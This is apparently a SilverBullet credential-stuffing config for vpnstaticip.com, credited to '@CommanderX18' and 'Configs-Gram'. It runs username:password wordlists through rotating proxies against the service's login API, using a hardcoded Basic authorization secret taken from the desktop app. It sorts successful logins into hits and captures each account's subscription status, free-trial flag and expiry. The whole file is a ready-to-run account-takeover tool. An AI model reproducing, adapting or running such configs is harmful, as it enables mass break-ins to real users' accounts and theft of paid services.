[SETTINGS]
{
  "Name": "Vpnstaticip.com#Configs-Gram",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-04-15T15:55:12.6461879+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@CommanderX18",
  "Version": "1.1.1 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "vpnstaticip",
  "IconPath": "Icon\\svbfile.ico",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#[access_token] REQUEST POST "https://vpnstaticip.com/api/app/v1/get_app_access_token.php" 
  CONTENT "grant_type=client_credentials" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: vpnstaticip.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Origin: file://" 
  HEADER "Authorization: Basic OWFlYjNiM2JkMWVkNWQ5NDU1MDA0NWRjYjFhZmMzMGI6NGY4N2ZjZWFiYTA1NGVlZDZmMTUzYzkxNjBjN2IwMDMwZTY1Yzc0MDgzYmVkOTEyYTRiZmViYWE3MjJkMTRmMA==" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) VPNstaticIP/2.0.7 Chrome/69.0.3497.106 Electron/4.0.5 Safari/537.36" 
  HEADER "Accept-Language: en-US" 
  HEADER "Accept-Encoding: gzip, deflate" 

#Get-token PARSE "<SOURCE>" LR "access_token\":\"" "\",\"" -> VAR "1" 

#User FUNCTION Constant "<USER>@vpnstaticip.com" -> VAR "2" 

#Login REQUEST POST "https://vpnstaticip.com/api/app/v1/get_account_access_token.php" 
  CONTENT "{\"parameters\":{\"username\":\"<2>\",\"password\":\"<PASS>\",\"app_username\":\"app_161827794014@vpnstaticip.com\"}}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: vpnstaticip.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Origin: file://" 
  HEADER "Authorization: Bearer <1>" 
  HEADER "contentType: application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) VPNstaticIP/2.0.7 Chrome/69.0.3497.106 Electron/4.0.5 Safari/537.36" 
  HEADER "Accept-Language: en-US" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect login details" 
    KEY "Account authentication failed!" 
    KEY "\",\"error_description\":\"" 
  KEYCHAIN Success OR 
    KEY "access_token\":\"" 
    KEY "expires_in\":" 

#Get-login-token PARSE "<SOURCE>" LR "access_token\":\"" "\",\"" -> VAR "3" 

#Get_account_data REQUEST POST "https://vpnstaticip.com/api/app/v1/get_account_data.php" 
  CONTENT "{\"parameters\":{\"account_access_token\":\"<3>\"}}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: vpnstaticip.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Origin: file://" 
  HEADER "Authorization: Bearer <1>" 
  HEADER "contentType: application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) VPNstaticIP/2.0.7 Chrome/69.0.3497.106 Electron/4.0.5 Safari/537.36" 
  HEADER "Accept-Language: en-US" 
  HEADER "Accept-Encoding: gzip, deflate" 

#custom_name PARSE "<SOURCE>" LR "custom_name\":\"" "\"," CreateEmpty=FALSE -> CAP "custom_name" 

#is_subscription PARSE "<SOURCE>" LR "is_subscription\":\"" "\"," CreateEmpty=FALSE -> CAP "is_subscription" 

#status PARSE "<SOURCE>" LR "status\":\"" "\"," CreateEmpty=FALSE -> CAP "status" 

#type PARSE "<SOURCE>" LR "type\":\"" "\"," CreateEmpty=FALSE -> CAP "type" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<custom_name>" Contains "Free Trial" 
    KEY "<is_subscription>" Contains "0" 
    KEY "<type>" Contains "free" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<status>" Contains "expired" 

#ConfigBy FUNCTION Constant "@CommanderX18" -> VAR "ConfigBy" 

#Copyright FUNCTION Constant "ᴄᴏɴғɪɢs-ɢʀᴀᴍ" -> VAR "Copyright" 

